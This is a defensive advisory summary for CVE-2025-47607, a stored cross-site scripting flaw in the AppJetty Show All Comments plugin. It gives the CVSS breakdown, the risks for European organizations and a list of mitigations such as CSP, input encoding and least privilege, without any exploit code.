CVE-2025-47607 is a medium-severity Stored Cross-Site Scripting (XSS) vulnerability affecting the AppJetty Show All Comments plugin, up to version 7.0.1. The vulnerability stems from improper neutralization of input during web page generation, classified under CWE-79. Specifically, the plugin fails to adequately sanitize or encode user-supplied input before rendering it in the web interface, allowing malicious actors to inject and store arbitrary JavaScript code. When other users view the affected comment sections, the malicious script executes in their browsers within the context of the vulnerable site. The CVSS 3.1 base score is 5.9, reflecting a network attack vector (AV:N), low attack complexity (AC:L), but requiring high privileges (PR:H) and user interaction (UI:R). The scope is changed (S:C), indicating that the vulnerability affects resources beyond the initially vulnerable component. The impact affects confidentiality, integrity, and availability at a low level, as the injected scripts could steal session tokens, manipulate displayed content, or perform actions on behalf of authenticated users. No known exploits are currently reported in the wild, and no patches have been linked yet. The vulnerability was published on May 7, 2025, and has been enriched by CISA, indicating recognition by US cybersecurity authorities. Stored XSS vulnerabilities are particularly dangerous because they persist on the server and affect all users who access the compromised content, increasing the attack surface and potential damage. AppJetty Show All Comments is commonly used in content management systems and e-commerce platforms to display user comments, making it a target for attackers seeking to compromise user sessions or conduct phishing attacks.

For European organizations, this vulnerability poses a risk primarily to websites and web applications utilizing the AppJetty Show All Comments plugin, especially those handling user-generated content such as forums, blogs, or e-commerce reviews. Successful exploitation could lead to theft of user credentials, session hijacking, defacement, or distribution of malware via injected scripts. This can damage brand reputation, lead to regulatory non-compliance under GDPR due to data breaches, and cause financial losses. The requirement for high privileges to exploit somewhat limits the threat to insiders or compromised accounts, but the changed scope means that once exploited, attackers could affect other components or users beyond the initial vector. Given the interconnected nature of European digital services and the emphasis on data protection, even medium-severity vulnerabilities like this can have outsized consequences if not addressed promptly.

1. Immediate review and sanitization of all user inputs in the Show All Comments plugin, ensuring proper encoding and escaping of HTML and JavaScript content before rendering. 2. Implement Content Security Policy (CSP) headers to restrict the execution of unauthorized scripts and reduce the impact of potential XSS payloads. 3. Enforce strict access controls and monitor for unusual activities from privileged accounts, as exploitation requires high privileges. 4. Conduct regular security audits and penetration testing focusing on user input handling in comment sections. 5. Apply principle of least privilege to user roles to minimize the number of accounts with high privileges. 6. Monitor vendor communications for official patches or updates and apply them promptly once available. 7. Educate users and administrators about the risks of stored XSS and encourage reporting of suspicious behavior. 8. Use web application firewalls (WAF) with rules tuned to detect and block common XSS attack patterns targeting this plugin.